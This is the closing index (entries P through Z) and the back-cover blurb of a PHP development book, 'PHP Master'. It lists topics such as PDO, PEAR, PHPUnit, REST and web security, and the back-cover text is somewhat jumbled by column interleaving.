installing, 317–320
serving over channel, 338–340
versioning, 334–336
packet sniffing, 198
page source, dumping, 278
parameters, typing, 13–15
partitions, 219
passwords, encrypting, 191
PCRE (Perl-Compatible Regular Expression) extension, 176
N
369
PDO (PHP Data Object)
about, 39, 44–45
binding to statements, 49–51
connecting to MySQL, 45
counting affected rows, 52–53, 58
deleting data, 53
escaping values, 49
handling exceptions, 54–57
inserting data, 52
retrieving data, 46–47
sorting data, 46
storing procedures, 59
transactions, 57–59
using prepared statements, 47–49
PDO::FETCH_ASSOC, 47
PDO::FETCH_BOTH, 47
PDO::FETCH_CLASS, 47
PDO::FETCH_NUM, 47
PDO::query() method, 46, 47
PDOException, 45
PDOStatement, 138
PEAR
about, 317
channel servers, 320–324, 336–340
compiling extensions, 326–329
creating packages, 329–334
installing extensions, 324–325
installing packages, 317–320
naming conventions, 244, 247, 324
other features, 340–341
package versioning, 334–336
PECL and, 317
PHP Code Sniffer, 290
phpDocumentor, 296
using PEAR code, 324
pear command, 317
pear package command, 333
PEAR_PackageFileManager2, 329
PECL (PHP Extension Community Library)
APC extension, 212, 238–239
compiling extensions, 326–329
installing extensions, 324–325
PEAR and, 317
pecl_http extension, 86–87
XHProf extension (see XHProf)
pecl command, 317, 325
pecl_http extension, 86–87
performance optimization
APC caching, 218
for databases, 216–217
disk caching, 218
memcached, 218–226
opcode caching, 210–215
session data caching, 215–216
performance testing, 203–210
Perl-Compatible Regular Expression
(PCRE) extension, 176
Phing, 314–315
PHP 4, vs PHP5, 3, 22
PHP Code Sniffer
installing, 290
running, 290–292
standards available, 293–294
viewing violations, 293
PHP Extension and Application Repository (PEAR) (see PEAR)
PHP Extension Community Library (PECL) (see PECL (PHP Extension
Community Library))
PHP life cycle, 211–212
PHP streams, 87–88, 118
370
php.ini file
automatically including code, 228,
278
configuring session options, 185
enabling APC extension, 212
enabling streams, 87
enabling XHProf, 228, 229
memcache setting, 216
PHP4, vs PHP5, 7, 289
PHP_EOL, 139
phpcpd (PHP Copy Paste detector), 287–
288
PHPDeveloper, 353
phpDocumentor, 296–298
phploc (PHP Lines of Code), 286–287
phpmd (PHP Project Mess Detector),
288–289
PHPSESSID parameter, 185
PHPUnit
about, 244
configuring, 247–248
connecting to database, 265–266
creating data sets, 266–269
CSS expressions, 262
installing, 244
output file, 248
running test cases, 246–249
Selenium extension (see Selenium)
test doubles, 250–253
writing database test cases, 264–265,
269–270
writing testable code, 253–258
writing unit test cases, 244–246
XPath expressions, 262
phpunit.xml file, 247
Pirum, 336–340
pirum.xml file, 337
placeholders, 48–49, 160
Planet PHP, 353
polymorphism, 14–15, 25
POST requests, 94, 106, 121–122, 182
$_POST variable, 90, 181
prepare() method, 48, 54–55, 191
prepared statements, 47, 190–191
primary keys, 42, 60
print_r(), 100, 103
private keyword, 19, 128, 250, 253
procedures, storing, 59
profiling, 226–227
(see also XHProf)
progressive enhancement, 109
properties
about, 2
in cloned objects, 17
non-existent, 22–23
static, 6–7
protected keyword, 19
proxy pattern, 142
public keyword, 18
PUT requests, 122–123
Q
q value, in headers, 93
queries (see MySQL)
question mark (?), 48
queues, 350–352
R
rainbow tables, 193
rand() function, 30
readEvents() function, 119
reCAPTCHA, 197
recursion, 142–144
371
RecursiveArrayIterator class, 143
RecursiveDirectoryIterator class, 345
RecursiveIterator class, 143
RecursiveIteratorIterator class, 139, 143,
147–149, 345
redeclaring, 13
references, 15–16
RegexIterator class, 139, 146–147
registry pattern, 131–136
regular expressions, 139, 146–147, 176
relational databases
aggregate functions, 68–69
foreign keys, 62–63
grouping data, 69
indexing, 60, 61–62
inner joins, 65–66
many-to-many relationships, 63–65
normalizing data, 70–72
one-to-many relationships, 42, 60, 62
optimizing performance, 216–217
outer joins, 67–68
primary keys, 60
Release Candidate, 335
Remote Procedure Call (RPC) services
(see RPC services)
remote-info command, 322
remotes, 309–310
repositories
about, 300
cloning, 306, 308–309
designing, 303–306
distributed, 306–308
working copies, 300
Request object, 117
$_REQUEST variable, 181
REQUEST_FILENAME variable, 160
requests
HTTP (see HTTP requests)
PHP, 211–212
require, 4
reset() method, 140
resources, REST, 115, 116
REST
about, 95, 114–115
collecting data, 117–118
creating data, 121–122
deleting data, 124
getting events, 120–121
limitations of, 123
MVC and, 118
principles of, 116
resources, 115, 116
rewriting requests, 116–117
routing requests, 118–119
storing data, 119–120
updating data, 122–123
URL usage, 115
rewind() method, 140
RewriteCond, 160
RIGHT JOIN statement, 67–68
rollback, 312
rollback() method, 57
rowCount() method, 52–53
RPC services
about, 95, 101
building, 104–106
consuming, 101–103
runGiven() method, 256–258
runThen() method, 256–258
runWhen() method, 256–258
S
salting, 193–194
372
Same Origin Policy, 106, 111
sanitization, 175
scalar values, 252
Schlitt, Tobias, 274
scope resolution operator (::), 6
$screenshotPath, 277
screenshots, as debug tool, 277–278
secure socket layers (SSL), 199
security
for APIs, 105
attack vectors (see attack vectors)
escaping output, 178–179
filtering input, 174–176
GET issues, 182
Same Origin Policy, 106, 111
of user data, 174–176
wireless network issues, 198
SELECT statement, 46, 61
Selenium
about, 270
assertions, 274–275
automating test writing, 279
commands, 272–273
database integration, 275–277
debugging tools, 277–278
locators, 273–274
setup, 271–272
Selenium IDE, 279
semicolon (;), 59, 93
serializing, 35–37
$_SERVER variable, 90, 91
$_SERVER['HTTP_HOST'] variable, 174
$_SERVER['PHP_SELF'] variable, 179
$_SERVER['REQUEST_URI'] variable,
160
service-oriented architecture (SOA), 74–
75
session data, caching, 215–216
session fixation, 184
session hijacking, 186
session prediction, 184
$_SESSION variable, 181
session.cookie_httponly, 187
session.name, 185
session.use_cookies, 185
session.use_only_cookies, 185
session.use_trans_sid, 185
session_regenerate_id() function, 186
__set() method, 22–23, 32
set() method, 132
set_error_handler() method, 31
set_exception_handler() method, 31
Set-Cookie header, 84
setHttpTimeout() method, 275
setNotes() function, 333
setPackage() function, 333
setReleaseStability() function, 333
setReleaseVersion() function, 333
setter methods, 21, 153
setUp() method, 246, 269
SHA-1 algorithm, 194
SHA-256 algorithm, 194
shallow copies, 17
Siege, 281–282
SimpleXML extension, 78–82
simplexml_load_file() function, 81
simplexml_load_string() function, 81
SimpleXMLElement, 79, 103, 138
singleton pattern, 128–130
sizeof() method, 348–349
__sleep(), 36–37
SOA (service-oriented architecture), 74–
75
373
SOAP
about, 95, 101
debugging options, 97
describing with WSDL, 97–99
implementing in PHP, 95–97
SoapClient class, 96, 99
SoapServer class, 96
source control
about, 299
components of, 300
for databases, 311–313
distributed, 306–308
repository structure, 303–306
resolving conflicts, 301–303
social, 308
using Git, 308–310
using Subversion, 301
specifications, BDD, 254–258
SPL (Standard PHP Library)
about, 24, 343
array objects, 343–344, 349–350
autoloading, 344–345
Countable interface, 23–24, 348–349
directory functions, 345–347
file functions, 345–347
heaps, 351–352
lists, 350
queues, 350–352
stacks, 344, 350–351
utility functions, 352
spl_object_hash(), 352
SplDoublyLinkedList, 350
SplFileInfo class, 345
SplFileObject, 347
SplFixedArray, 349–350
SplHeap class, 351
SplPriorityQueue class, 351–352
SplQueue class, 350–351
SplStack class, 350–351
SplTempFileObject, 347
sprintf(), 171
SQL Injection, 189
SQLSTATE codes, 56
SSL (secure socket layers), 199
stability markers, 318, 335
Stack Overflow forum, 356
stacks, 344, 350–351
Standard PHP Library (SPL) (see SPL
(Standard PHP Library))
statelessness, 40, 116
static analysis
about, 285–286
with phpcpd, 287–288
with phploc, 286–287
with phpmd, 288–289
static keyword, 6, 250, 253
static methods, 6–7
static properties, 6–7
status codes, 88–90
stress testing, 203–210
stubbing, 251, 253
Subversion
commands, 301
repository design, 303–306
resolving conflicts, 301–303
SUM, 68
superglobals ($_), 90
symlink, 232, 311
systems testing
about, 270
database integration, 275–277
debugging, 277–278
Selenium assertions, 274–275
Selenium commands, 272–273
374
Selenium locators, 273–274
Selenium setup, 271–272
with automating test writing, 279
T
T_PAAMAYIM_NEKUDOTAYIM error,
6
tags, in repository, 304
tar command, 326
tcpdump, 101
TDD (test-driven development), 253
tearDown() method, 246, 269
test cases
BDD specifications, 254–258
for databases, 264–265, 269–270, 275–
277
running, 246–249
writing, 244–246
test doubles, 250–253
test() method, 246
test-driven development (TDD), 253
testing
benchmarking, 203–210
coding considerations, 253–258
databases (see database testing)
load (see load testing)
singleton problems, 130
systems (see systems testing)
unit (see unit testing)
text files, serialized, 119
$this variable, 3, 6
threads, 204
throw keyword, 28
__toString method, 34–35
trace option, 97
traffic, inspecting, 100–101
trait keyword, 130
traits, 130–131
transactions, 57–59
triggers, 150
trunk, in repository, 303
try-catch blocks, 27, 29
type hinting, 13–14, 30
type:key placeholder, 160
typecasting, 82
U
Unconferences, 354
underscore, double (__), 3
underscore, single (_), 324
Unified Modeling Language (UML), 11
unit testing
about, 243–244
functional vs., 260–262
MVC components, 259–263
of dependent classes, 249–253
running test cases, 246–249
writing test cases, 244–246
writing testable code, 253–258
unset() method, 132
UPDATE statement, 53
URL collections, 115
url_rewriter.tags, 185
URLs
in REST, 115
rewriting, 159–160, 185
use keyword, 130
use operator, 10
user authentication, 183, 186
user groups, 355
User-Agent header, 83, 188
375
V
valid() method, 140, 144
validation, 175
var_dump() method, 4
variables, naming, 289
version control
for code (see source control)
for PEAR packages, 334–336
views, 171, 259–263
Virtual conferences, 354
visibility
choosing, 20–21
level of, 18–20
using __get/__set, 22–23
using getter/setter, 21
W
waitFor*() method, 275
waitForNot*() method, 275
__wakeup(), 36–37
Web Service Description Language
(WSDL), 95, 97–99
web services, 73
(see also APIs (Application Programming Interfaces))
Westhoff, Jakob, 274
WHERE command, 48
wireless networks, 198
Wireshark, 100
working copy, 300
writeEvents() function, 119
WSDL (Web Service Description Language), 95, 97–99
X
Xdebug, 227, 249, 327
XHGui
comparing test runs, 239–241
enabling APC cache, 238–239
installing interface, 232–234
results page, 236–238
setting a profile, 234–236
XHProf
about, 227
call stack, 231, 232
comparing test runs, 239–241
enabling APC cache, 238–239
installing, 227–230
installing XHGui interface, 232–234
running, 230–232
setting XHGui profile, 234–236
user interface, 230
XHGui results page, 236–238
XML
as API data format, 78–82, 138
creating data sets with, 266
datasets, 266
loading to a stack, 350
locating elements, 273–274
Phing config file, 314–315
YAML, 266
XPath expressions, 262, 273, 274
XSS (cross-site scripting), 176
Y
YAML, 266
Z
zend_extensions, 329
ALL SOURCE CODE AVAILABLE FOR DOWNLOAD
Advanced Performance Testing
Powerful OOP Blueprints
Watertight Security Tactics
Test and evaluate your PHP for
maximum performance
Use objected oriented programming
blueprints to organize your code
Protect your apps with advanced
security techniques
SHARP, SURE-FIRE TECHNIQUES
GUARANTEED TO TAKE YOUR PHP
SKILLS TO THE NEXT LEVEL
THE AUTHORS
Lorna Jane Mitchell is a PHP
consultant based in Leeds,
UK with a Masters in
Electronic Engineering. She
organizes the PHP North
West Conference and user
group, and has written for .net
magazine and php|architect,
PHP Master: Write Cutting-edge Code is tailor-made for PHP
lornajane.net
LORNA
MITCHELL
applications. This book will help you to employ the most effective
object oriented programming approaches, wrap your projects in
layers of security, and ensure your code is doing its job perfectly.
You’ll learn how to:
 Create professional, dynamic applications based on an object oriented
programming blueprint
cy

DAVEY
SHAFIK
 Protect your code against attacks with the latest security systems
And much more …
SITEPOINT BOOKS
Advocate best practice techniques
Lead you through practical examples
Provide working code for your website
Make learning easy and fun
with PHP and the LAMP stack,
as well as HTML, CSS, and
JavaScript for over a decade.
With several books, articles,
and conference appearances
under his belt, he enjoys
teaching others any way he
can. An avid photographer, he
lives in sunny Florida with his
wife and six cats.
Matthew Turland has been
using PHP since 2002. Since
that time, he’s become a
 Utilize modern testing methods to keep your applications watertight
 Plug in serious functionality with PHP’s APIs and libraries
Lorna blogging regularly on
her own site, lornajane.net.
matthewturland.com
MATTHEW
TURLAND
both PHP 5 and Zend
Framework, published articles
in php|architect magazine,
and contributed to books on
PHP. He’s also been a
speaker at php|tek, Confoo,
and ZendCon.
WEB DEVELOPMENT
ISBN PRINT:978-0-9870908-7-4
ISBN EBOOK:978-0-9871530-4-3
US $39.95
Visit us on the Web at sitepoint.com or for sales and support email books@sitepoint.com
CAN $39.95
Download